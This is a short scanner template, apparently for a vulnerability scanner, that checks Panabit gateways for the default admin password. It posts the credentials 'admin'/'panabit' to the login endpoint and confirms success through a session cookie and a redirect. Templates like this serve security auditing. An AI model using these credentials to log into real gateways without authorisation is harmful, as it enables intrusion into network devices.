id: panabit-gateway-default-password

info:
    name: Panabit Gateway Default Password
    author: Print1n(https://github.com/Print1n)
    severity: high
    verified: true
    description: app="Panabit-智能网关"

rules:
    r0:
        request:
            method: POST
            path: /login/userverify.cgi
            body: username=admin&password=panabit
        expression: response.status == 200 && response.headers["set-cookie"].contains("paonline_admin") && response.body.bcontains(b"URL=/index.htm")
expression: r0()

